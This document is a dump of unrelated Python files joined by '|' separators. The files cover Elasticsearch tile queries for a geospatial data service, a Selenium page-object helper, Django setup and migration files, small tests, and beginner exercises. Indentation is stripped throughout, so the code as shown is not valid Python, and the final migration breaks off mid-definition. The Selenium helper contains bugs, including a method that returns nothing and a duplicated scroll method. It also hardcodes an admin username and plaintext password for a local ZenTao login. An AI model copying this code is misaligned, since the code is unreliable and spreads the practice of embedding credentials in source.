datasets = self.get_data_series_list_simple()
for dataset in datasets:
min_date = self.find_min_date_from_tiles([], ds=dataset['title'])
max_date = self.find_max_date_from_tiles([], ds=dataset['title'])
dataset['start'] = (min_date - EPOCH).total_seconds()
dataset['end'] = (max_date - EPOCH).total_seconds()
dataset['iso_start'] = min_date.strftime(ISO_8601)
dataset['iso_end'] = max_date.strftime(ISO_8601)
return datasets
def get_data_series_list_simple(self):
params = {
'size': 0,
"aggs": {
"dataset_list_agg": {
"composite": {
"size":100,
"sources": [
{
"dataset_s": {
"terms": {
"field": "dataset_s"
}
}
}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'dataset_list_agg')
l = []
for dataset in aggregations:
l.append({
"shortName": dataset['key']['dataset_s'],
"title": dataset['key']['dataset_s'],
"tileCount": dataset["doc_count"]
})
l = sorted(l, key=lambda entry: entry["title"])
return l
def get_data_series_stats(self, ds):
params = {
"size": 0,
"query": {
"term":{
"dataset_s": {
"value": ds
}
}
},
"aggs": {
"available_dates": {
"composite": {
"size": 100,
"sources": [
{"terms_tile_max_time_dt": {"terms": {"field": "tile_max_time_dt"}}}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'available_dates')
stats = {}
stats['available_dates'] = []
for dt in aggregations:
stats['available_dates'].append(dt['key']['terms_tile_max_time_dt'] / 1000)
stats['available_dates'] = sorted(stats['available_dates'])
params = {
"size": 0,
"query": {
"term":{
"dataset_s": {
"value": ds
}
}
},
"aggs": {
"min_tile_min_val_d": {
"min": {
"field": "tile_min_val_d"
}
},
"min_tile_max_time_dt": {
"min": {
"field": "tile_max_time_dt"
}
},
"max_tile_max_time_dt": {
"max": {
"field": "tile_max_time_dt"
}
},
"max_tile_max_val_d": {
"max": {
"field": "tile_max_val_d"
}
}
}
}
aggregations = self.do_aggregation(*(None, None, None, False, None), **params)
stats["start"] = int(aggregations["min_tile_max_time_dt"]["value"]) / 1000
stats["end"] = int(aggregations["max_tile_max_time_dt"]["value"]) / 1000
stats["minValue"] = aggregations["min_tile_min_val_d"]["value"]
stats["maxValue"] = aggregations["max_tile_max_val_d"]["value"]
return stats
# day_of_year_i added (SDAP-347)
def find_tile_by_polygon_and_most_recent_day_of_year(self, bounding_polygon, ds, day_of_year):
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": "1",
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"day_of_year_i": {
"lte": day_of_year
}
}
}
]
}
}
}
result, _, _ = self.do_query(*(None, None, None, True, 'day_of_year_i desc'), **params)
return [result[0]]
def find_days_in_range_asc(self, min_lat, max_lat, min_lon, max_lon, ds, start_time, end_time, **kwargs):
search_start_s = datetime.utcfromtimestamp(start_time).strftime(ELASTICSEARCH_FORMAT)
search_end_s = datetime.utcfromtimestamp(end_time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": "0",
"_source": "tile_min_time_dt",
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"range": {
"tile_min_time_dt": {
"gte": search_start_s,
"lte": search_end_s
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
}
]
}
},
"aggs": {
"days_range_agg": {
"composite": {
"size":100,
"sources": [
{
"tile_min_time_dt": {
"terms": {
"field": "tile_min_time_dt"
}
}
}
]
}
}
}
}
aggregations = self.do_aggregation_all(params, 'days_range_agg')
results = [res['key']['tile_min_time_dt'] for res in aggregations]
daysinrangeasc = sorted([(res / 1000) for res in results])
return daysinrangeasc
def find_all_tiles_in_box_sorttimeasc(self, min_lat, max_lat, min_lon, max_lon, ds, start_time=0,
end_time=-1, **kwargs):
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, 'tile_min_time_dt asc,tile_max_time_dt asc'), **params)
def find_all_tiles_in_polygon_sorttimeasc(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
nums = re.findall(r'\d+(?:\.\d*)?', bounding_polygon.wkt.rpartition(',')[0])
polygon_coordinates = list(zip(*[iter(nums)] * 2))
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
}
]
}
}
}
try:
if 'fl' in list(kwargs.keys()):
params["_source"] = kwargs["fl"].split(',')
except KeyError:
pass
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
return self.do_query_all(*(None, None, None, False, 'tile_min_time_dt asc,tile_max_time_dt asc'), **params)
def find_all_tiles_in_polygon(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
nums = re.findall(r'\d+(?:\.\d*)?', bounding_polygon.wkt.rpartition(',')[0])
polygon_coordinates = list(zip(*[iter(nums)] * 2))
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
try:
if 'fl' in list(kwargs.keys()):
params["_source"] = kwargs["fl"].split(',')
except KeyError:
pass
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_distinct_bounding_boxes_in_polygon(self, bounding_polygon, ds, start_time=0, end_time=-1, **kwargs):
tile_max_lat = bounding_polygon.bounds[3]
tile_min_lon = bounding_polygon.bounds[0]
tile_min_lat = bounding_polygon.bounds[1]
tile_max_lon = bounding_polygon.bounds[2]
params = {
"size": 0,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[tile_min_lon, tile_max_lat], [tile_max_lon, tile_min_lat]]
},
"relation": "intersects"
}
}
}
]
}
},
"aggs": {
"distinct_bounding_boxes": {
"composite": {
"size": 100,
"sources": [
{
"bounding_box": {
"terms": {
"script": {
"source": "String.valueOf(doc['tile_min_lon'].value) + ', ' + String.valueOf(doc['tile_max_lon'].value) + ', ' + String.valueOf(doc['tile_min_lat'].value) + ', ' + String.valueOf(doc['tile_max_lat'].value)",
"lang": "painless"
}
}
}
}
]
}
}
}
}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
aggregations = self.do_aggregation_all(params, 'distinct_bounding_boxes')
distinct_bounds = []
for agg in aggregations:
coords = agg['key']['bounding_box'].split(',')
min_lon = round(float(coords[0]), 2)
max_lon = round(float(coords[1]), 2)
min_lat = round(float(coords[2]), 2)
max_lat = round(float(coords[3]), 2)
polygon = 'POLYGON((%s %s, %s %s, %s %s, %s %s, %s %s))' % (min_lon, max_lat, min_lon, min_lat, max_lon, min_lat, max_lon, max_lat, min_lon, max_lat)
distinct_bounds.append(wkt.loads(polygon).bounds)
return distinct_bounds
def find_tiles_by_exact_bounds(self, minx, miny, maxx, maxy, ds, start_time=0, end_time=-1, **kwargs):
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"term": {
"tile_min_lon": {
"value": minx
}
}
},
{
"term": {
"tile_min_lat": {
"value": miny
}
}
},
{
"term": {
"tile_max_lon": {
"value": maxx
}
}
},
{
"term": {
"tile_max_lat": {
"value": maxy
}
}
}
]
}
}}
if 0 < start_time <= end_time:
params["query"]["bool"]["should"] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_in_box_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, search_time, **kwargs):
the_time = datetime.utcfromtimestamp(search_time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_in_polygon_at_time(self, bounding_polygon, ds, search_time, **kwargs):
the_time = datetime.utcfromtimestamp(search_time).strftime(ELASTICSEARCH_FORMAT)
max_lat = bounding_polygon.bounds[3]
min_lon = bounding_polygon.bounds[0]
min_lat = bounding_polygon.bounds[1]
max_lon = bounding_polygon.bounds[2]
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "intersects"
}
}
},
{ "range": {
"tile_min_time_dt": {
"lte": the_time
}
} },
{ "range": {
"tile_max_time_dt": {
"gte": the_time
}
} }
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_within_box_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, time, **kwargs):
the_time = datetime.utcfromtimestamp(time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat],[max_lon, min_lat]]
},
"relation": "within"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
]
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, "product(tile_avg_val_d, tile_count_i),*", None, False, None), **params)
def find_all_boundary_tiles_at_time(self, min_lat, max_lat, min_lon, max_lon, ds, time, **kwargs):
the_time = datetime.utcfromtimestamp(time).strftime(ELASTICSEARCH_FORMAT)
params = {
"size": 1000,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"geo_shape": {
"geo": {
"shape": {
"type": "multilinestring",
"coordinates": [[[min_lon, max_lat], [max_lon, max_lat], [min_lon, max_lat], [min_lon, min_lat], [max_lon, max_lat], [max_lon, min_lat], [min_lon, min_lat], [max_lon, min_lat]]]
},
"relation": "intersects"
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
},
{
"range": {
"tile_min_time_dt": {
"lte": the_time
}
}
},
{
"range": {
"tile_max_time_dt": {
"gte": the_time
}
}
}
],
"must_not" : {
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
},
"relation": "within"
}
}
}
}
}
}
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def find_all_tiles_by_metadata(self, metadata, ds, start_time=0, end_time=-1, **kwargs):
"""
Get a list of tile metadata that matches the specified metadata, start_time, end_time.
:param metadata: List of metadata values to search for tiles e.g ["river_id_i:1", "granule_s:granule_name"]
:param ds: The dataset name to search
:param start_time: The start time to search for tiles
:param end_time: The end time to search for tiles
:return: A list of tile metadata
"""
params = {
"query": {
"bool": {
"must": [
{
"term": {
"dataset_s": {"value": ds}
}
}
]
}
}
}
if len(metadata) > 0:
for key_value in metadata:
key = key_value.split(':')[0]
value = key_value.split(':')[1]
params['query']['bool']['must'].append({"match": {key: value}})
if 0 < start_time <= end_time:
params['query']['bool']['should'] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
self._merge_kwargs(params, **kwargs)
return self.do_query_all(*(None, None, None, False, None), **params)
def get_formatted_time_clause(self, start_time, end_time):
search_start_s = datetime.utcfromtimestamp(start_time).strftime(ELASTICSEARCH_FORMAT)
search_end_s = datetime.utcfromtimestamp(end_time).strftime(ELASTICSEARCH_FORMAT)
time_clause = [
{
"range": {
"tile_min_time_dt": {
"lte": search_end_s,
"gte": search_start_s
}
}
},
{
"range": {
"tile_max_time_dt": {
"lte": search_end_s,
"gte": search_start_s
}
}
},
{
"bool": {
"must": [
{
"range": {
"tile_min_time_dt": {
"gte": search_start_s
}
}
},
{
"range": {
"tile_max_time_dt": {
"lte": search_end_s
}
}
}
]
}
}
]
return time_clause
def get_tile_count(self, ds, bounding_polygon=None, start_time=0, end_time=-1, metadata=None, **kwargs):
"""
Return number of tiles that match search criteria.
:param ds: The dataset name to search
:param bounding_polygon: The polygon to search for tiles
:param start_time: The start time to search for tiles
:param end_time: The end time to search for tiles
:param metadata: List of metadata values to search for tiles e.g ["river_id_i:1", "granule_s:granule_name"]
:return: number of tiles that match search criteria
"""
params = {
"size": 0,
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"range": {
"tile_count_i": {
"gte": 1
}
}
}
]
}
}
}
if bounding_polygon:
min_lon, min_lat, max_lon, max_lat = bounding_polygon.bounds
geo_clause = {
"geo_shape": {
"geo": {
"shape": {
"type": "envelope",
"coordinates": [[min_lon, max_lat], [max_lon, min_lat]]
}
}
}
}
params['query']['bool']['filter'].append(geo_clause)
if 0 < start_time <= end_time:
params['query']['bool']['should'] = self.get_formatted_time_clause(start_time, end_time)
params["query"]["bool"]["minimum_should_match"] = 1
if len(metadata) > 0:
for key_value in metadata:
key = key_value.split(':')[0]
value = key_value.split(':')[1]
params['query']['bool']['filter'].append({"term": {key: {"value": value}}})
self._merge_kwargs(params, **kwargs)
_, _, found = self.do_query(*(None, None, None, True, None), **params)
return found
def do_aggregation(self, *args, **params):
# Gets raw aggregations
response = self.do_query_raw(*args, **params)
aggregations = response.get('aggregations', None)
return aggregations
def do_aggregation_all(self, params, agg_name):
# Used for pagination when results can exceed ES max size (use of after_key)
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
all_buckets = []
try:
aggregations = response.get('aggregations', None)
current_buckets = aggregations.get(agg_name, None)
buckets = current_buckets.get('buckets', None)
all_buckets += buckets
after_bucket = current_buckets.get('after_key', None)
while after_bucket is not None:
for agg in params['aggs']:
params['aggs'][agg]['composite']['after'] = {}
for source in params['aggs'][agg]['composite']['sources']:
key_name = next(iter(source))
params['aggs'][agg]['composite']['after'][key_name] = after_bucket[key_name]
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
aggregations = response.get('aggregations', None)
current_buckets = aggregations.get(agg_name, None)
buckets = current_buckets.get('buckets', None)
all_buckets += buckets
after_bucket = current_buckets.get('after_key', None)
except AttributeError as e:
self.logger.error('Error when accessing aggregation buckets - ' + str(e))
return all_buckets
def do_query(self, *args, **params):
response = self.do_query_raw(*args, **params)
return response['hits']['hits'], None, response['hits']['total']['value']
def do_query_raw(self, *args, **params):
if args[4]:
sort_fields = args[4].split(",")
if 'sort' not in list(params.keys()):
params["sort"] = []
for field in sort_fields:
field_order = field.split(' ')
sort_instruction = {field_order[0]: field_order[1]}
if sort_instruction not in params['sort']:
params["sort"].append(sort_instruction)
with ELASTICSEARCH_CON_LOCK:
response = self.elasticsearchcon.search(index=self.elasticsearchIndex, body=params)
return response
def do_query_all(self, *args, **params):
# Used to paginate with search_after.
# The method calling this might already have a sort clause,
# so we merge both sort clauses inside do_query_raw
results = []
search = None
# Add track option to not be blocked at 10000 hits per worker
if 'track_total_hits' not in params.keys():
params['track_total_hits'] = True
# Add sort instruction order to paginate the results :
params["sort"] = [
{ "tile_min_time_dt": "asc"},
{ "_id": "asc" }
]
response = self.do_query_raw(*args, **params)
results.extend([r["_source"] for r in response["hits"]["hits"]])
total_hits = response["hits"]["total"]["value"]
try:
search_after = []
for sort_param in response["hits"]["hits"][-1]["sort"]:
search_after.append(str(sort_param))
except (KeyError, IndexError):
search_after = []
try:
while len(results) < total_hits:
params["search_after"] = search_after
response = self.do_query_raw(*args, **params)
results.extend([r["_source"] for r in response["hits"]["hits"]])
search_after = []
for sort_param in response["hits"]["hits"][-1]["sort"]:
search_after.append(str(sort_param))
except (KeyError, IndexError):
pass
return results
def convert_iso_to_datetime(self, date):
return datetime.strptime(date, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=UTC)
def convert_iso_to_timestamp(self, date):
return (self.convert_iso_to_datetime(date) - EPOCH).total_seconds()
@staticmethod
def _merge_kwargs(params, **kwargs):
# Only Solr-specific kwargs are parsed
# And the special 'limit'
try:
params['limit'] = kwargs['limit']
except KeyError:
pass
try:
params['_route_'] = kwargs['_route_']
except KeyError:
pass
try:
params['size'] = kwargs['size']
except KeyError:
pass
try:
params['start'] = kwargs['start']
except KeyError:
pass
try:
s = kwargs['sort'] if isinstance(kwargs['sort'], list) else [kwargs['sort']]
except KeyError:
s = None
try:
params['sort'].extend(s)
except KeyError:
if s is not None:
params['sort'] = s
|
from ..extensions import marshmallow
from marshmallow import post_dump
import pycountry
class UserInformationSchema(marshmallow.Schema):
class Meta:
fields = ('country', 'bio')
@post_dump
def country_alpha_2_to_name(self, in_data):
""" Transform country alpha_2 to country name """
in_data['country'] = [x.name for x in pycountry.countries if x.alpha_2 == in_data['country']][0].capitalize()
return in_data
|
#!/usr/bin/env python
from setuptools import setup
setup(
# GETTING-STARTED: set your app name:
name='PrezisBackend',
# GETTING-STARTED: set your app version:
version='1.0.0',
# GETTING-STARTED: set your app description:
description='Backend service for PrezisUI',
# GETTING-STARTED: set author name (your name):
author='Boros Gabor',
# GETTING-STARTED: set author email (your email):
author_email='gabor.brs@gmail.com',
# GETTING-STARTED: set author url (your url):
url='https://hu.linkedin.com/in/gaborbrs',
# GETTING-STARTED: define required django version:
install_requires=[
'Django==1.9.4',
'djangorestframework',
'django-cors-headers',
'django-filter',
'django-extensions',
],
dependency_links=[
'https://pypi.python.org/simple/django/',
'https://pypi.python.org/simple/djangorestframework/'
],
)
|
from selenium import webdriver
from time import sleep
from selenium.webdriver.support.select import Select
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
class Base():
def __init__(self,driver:webdriver.Firefox):
self.driver = driver
self.timeout=10
self.t = 0.5
# 使用EC的方式进行查找元素,找到了返回这个元素,找不到提示超时异常
def findEleByEC(self,locator):
ele = WebDriverWait(self.driver, self.timeout,self.t).until(EC.presence_of_element_located(locator))
return ele
def findElement(self,locator):
ele = WebDriverWait(self.driver, self.timeout,self.t).until(lambda x: x.find_element(*locator))
# element = WebDriverWait(driver, 10,1).until(lambda x: x.find_element_by_id("someId"))
return ele
def findElements(self,locator):
# element = WebDriverWait(driver, 10,1).until(lambda x: x.find_element_by_id("someId"))
eles = WebDriverWait(self.driver, self.timeout,self.t).until(lambda x: x.find_elements(*locator))
return eles
def sendKeys(self,locator,text):
ele = self.findElement(locator)
ele.send_keys(text)
def click(self,locator):
ele = self.findElement(locator)
ele.click()
def clear(self,locator):
ele = self.findElement(locator)
ele.clear()
def isSelected(self,locator):
'''
判断元素是否被选中
'''''
ele = self.findElement(locator)
r = ele.is_selected()
return
# 判断元素是否存在第一种方法
def isElementExist(self,locator):
try:
ele=self.findElement(locator)
return True
except Exception as info:
print(info)
return False
# 判断元素是否存在第二种方法
def isElementExist2(self,locator):
eles=self.findElements(locator)
n = len(eles)
if n == 0:
return False
elif n ==1:
return True
else:
print("定位到元素的个数:%d" % n)
return True
# 使用EC的方法判断title的方法1:EC.title_is(_title)
def is_title(self,_title):
"""
:param _title: 为期望结果
:return: 返回的结果为True和False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.title_is(_title))
return result
except:
return False
# 使用EC的方法判断title的方法2:EC.title_contains(_title)
def is_title_contains(self,_title):
"""
:param _title: 为期望结果
:return: 返回的结果为True和False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.title_contains(_title))
return result
except:
return False
# 判断文本是不是在这个元素里面
def is_text_in_element(self,locator,_text):
"""
判断文本是不是在这个元素里面
:param _text: 希望结果
:return: True和False
"""
try:
result= WebDriverWait(self.driver, self.timeout,self.t).until(EC.text_to_be_present_in_element(locator,_text))
return result
except:
return False
# 判断一个元素的value属性值
def is_value_in_element(self,locator,_value):
"""
:param locator:
:param value:
:return: 空和错误都是返回False,正确则返回True
"""
try:
result = WebDriverWait(self.driver, self.timeout,self.t).until(EC.text_to_be_present_in_element_value(locator,_value))
return result
except:
return False
def is_alert(self):
"""
:return: 如果有则返回alert对象,调用该方法后,可以根据alert对象获取到该对象属性值
"""
try:
result = WebDriverWait(self.driver,self.timeout,self.t).until(EC.alert_is_present())
return result
except:
return False
def get_text(self,locator):
"""
获取元素的文本信息
:param locator: 定位
:return: 成功返回元素的文本信息,失败返回空
"""
try:
t = self.findElement(locator).text
return t
except:
print("获取文本失败,返回'' ")
return ""
# 封装鼠标悬停事件
def move_to_element(self,locator):
ele = self.findElement(locator)
ActionChains(driver).move_to_element()
# 封装select方法 index value和文本
# 需要先定位到select标签
def select_by_index(self,locator,index=0):
ele = self.findElement(locator)
Select(ele).select_by_index(index)
def select_by_valuex(self,locator,value):
ele = self.findElement(locator)
Select(ele).select_by_value(value)
def select_by_text(self,locator,text):
ele = self.findElement(locator)
Select(ele).select_by_visible_text(text)
# 浏览器js操作滚动条
# 聚焦到指定的元素位置
def js_focus_element(self,locator):
target = self.findElement(locator)
driver.execute_script("arguments[0].scrollIntoView();",target)
# 滚动到顶部
def js_scroll_top(self):
js = "window.scrollTo(0,0)"
driver.execute_script(js)
# 滚动到底部
def js_scroll_top(self):
js = "window.scrollTo(0,document.body.scrollHeight)"
driver.execute_script(js)
# 横向滚动
def js_scroll_Hengxiang(self,x=0):
js = "window.scrollTo(%s,document.body.scrollHeight)" %x
driver.execute_script(js)
if __name__ == '__main__':
driver = webdriver.Firefox()
driver.get("http://127.0.0.1:82/zentao/user-login-L3plbnRhby8=.html")
zentao = Base(driver)
# loc1 = (By.ID, "account")
# loc2 = (By.NAME, "password")
# loc3 = (By.CSS_SELECTOR, "#submit")
loc1 = ("id","account");
loc2 = ("name","password")
loc3 = ("css selector","#submit")
zentao.sendKeys(loc1,"admin")
zentao.sendKeys(loc2,"Yanfengmusic521")
zentao.click(loc3)
|
"""
Faça um programa que receba 2 listas compostas por números inteiros e as junte em uma só
lista ordenada de forma não decrescente.
Exemplo
Entrada Saída
[1,5,2,7],[3,2,9] [1,2,2,3,5,7,9]
[50,30,10],[15,10,5][5,10,10,15,30,50]
"""
#Solução
l1=[52, 65, 26, 58, 84, 33, 37, 38, 85, 82]
l2=[59, 29, 85, 29, 41, 85, 55, 59, 31, 57]
tamanho=len(l1)+len(l2)
cont1=0
cont2=0
lmerge=[]
for j in range(1, len(l1), 1):
for i in range(0, len(l1)-1, 1):
if l1[i]>l1[i+1]:
l1[i],l1[i+1]=l1[i+1],l1[i]
for j in range(1, len(l2), 1):
for i in range(0, len(l2)-1, 1):
if l2[i]>l2[i+1]:
l2[i],l2[i+1]=l2[i+1],l2[i]
print(l1)
print(l2)
for i in range(1, tamanho+1, 1):
if cont1<len(l1) and cont2<len(l2):
if l1[cont1]<=l2[cont2]:
lmerge.append(l1[cont1])
cont1+=1
else:
lmerge.append(l2[cont2])
cont2+=1
elif cont1>=len(l1):
lmerge.append(l2[cont2])
cont2+=1
else:
lmerge.append(l1[cont1])
cont1+=1
print(lmerge)
|
"""
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from ..interpolated_functions import interpolated_distmod
def test_dist_mod():
z = np.linspace(0,1,100)
d = interpolated_distmod(z)
assert np.all(d >= 0.0)
|
import pytest
from ProxyO.parser import ProxyServer, ProxyO
import faker
@pytest.fixture(scope='function')
def proxy_parser():
def _proxy_parser(type_=False, data=False):
if type_:
fake = faker.Faker()
fake_dict = dict(
ip=fake.ipv4(),
country=dict(),
anonymity=fake.word(),
uptime=float(fake.random_number()),
port=fake.random_number(),
)
return ProxyServer(**fake_dict)
if data:
fake_dict = dict(
ip='127.0.0.1',
country=dict(hello=1),
anonymity='Hello',
uptime=1.123,
port=8080,
)
return ProxyServer(**fake_dict)
return _proxy_parser
def test_type_proxy_server_parser(proxy_parser):
proxy_server = proxy_parser(type_=True)
assert type(proxy_server.ip) == str
assert type(proxy_server.country) == dict
assert type(proxy_server.uptime) == float
assert type(proxy_server.anonymity) == str
assert type(proxy_server.port) == int
def test_data_proxy_server_parser(proxy_parser):
proxy_server = proxy_parser(data=True, type_=False)
assert proxy_server.ip == '127.0.0.1'
assert proxy_server.country == dict(hello='1')
assert proxy_server.uptime == 1.123
assert proxy_server.anonymity == 'Hello'
assert proxy_server.port == 8080
def test_proxy_object():
proxy_createor = ProxyO()
assert type(proxy_createor.list_proxy()) == list
assert type(proxy_createor.list_proxy(country='RU')) == list
assert type(proxy_createor.list_proxy(port=80)) == list
|
import glob
# import xml.etree.ElementTree as ET
# tree = ET.parse("./brcm-lnvgy_fw_cna_18b-oc14-12.0.1169.12-2_linux_x86-64.xml")
# print(tree.getroot())
# root = tree.getroot()
# crc = root.findall(".//*[@NAME='crc']/VALUE")
# for value in crc:
# print(value.text)
def strnset(str,ch,n): # string change
str = str[:n] + ch
return str
ll = []
listuxz = glob.glob("./*/*.uxz")
for tpm in listuxz:
ll.append(strnset(tpm,".xml",-4))
for tt in ll:
print(tt)
# import os
# from openpyxl import Workbook
# import datetime
# system = os.name
# env = os.environ
# filePath = os.path.abspath('.')
# print(system)
# print(filePath)
#
# wb = Workbook()
# ws = wb.active
# ws.title = "platform"
# ws['A1'] = 42
# ws.append([1,2,3])
# ws['b1'] = datetime.datetime.now()
# ws['A3'] = system
# ws['A4'] = filePath
# ws1 = wb.create_sheet("win2019")
# ws2 = wb.create_sheet("win2016")
# ws3 = wb.create_sheet("rhel7")
# ws4 = wb.create_sheet("suse12")
#
# wb.save("sample.xlsx")
|
#PASUMARTHI RUTWIK(19BCS084)
class node:
def __init__(self,key):
self.val=key
self.left=None
self.right=None
def printInorder(root):
if root:
printInorder(root.left)
print(root.val)
printInorder(root.right)
def printPostorder(root):
if root:
printPostorder(root.left)
printPostorder(root.right)
print(root.val)
def printPreorder(root):
if root:
print(root.val)
printPreorder(root.left)
printPreorder(root.right)
root=node("A")
root.left=node("B")
root.right=node("U")
root.left.left=node("S")
root.left.left.left=node("W")
root.left.left.left.left=node("Z")
root.left.right=node("R")
root.left.right.left=node("Y")
root.left.right.right=node("A")
root.right.left=node("E")
root.right.right=node("P")
root.right.right.left=node("G")
root.right.right.right=node("J")
print("Inorder is")
printInorder(root)
print("Postorder is")
printPostorder(root)
print("Preorder is")
printPreorder(root)
|
"""
Don't use this.
"""
import PyPDF2
def main():
"""Driver"""
text = ""
filename = 'sample_paper.pdf'
with open(filename, 'rb') as f:
read_pdf = PyPDF2.PdfFileReader(f)
num_pages = read_pdf.getNumPages()
for page_num in range(num_pages):
page = read_pdf.getPage(page_num)
page_content = page.extractText()
text += page_content
with open('pdfs_as_txt/' + filename.replace('.pdf', '.txt'), 'w') as f:
f.write(text)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2019-01-27 04:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Idea',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(editable=False, verbose_name='creation date and time')),
('modified', models.DateTimeField(editable=False, null=True, verbose_name='modification date and time')),
('meta_keywords', models.CharField(blank=True, help_text='Separate keywords by comma.', max_length=255, verbose_name='Keywords')),
('meta_description', models.CharField(blank=True, max_length=255, verbose_name='Description')),
('meta_author', models.CharField(blank=True, max_length=255, verbose_name='Author')),
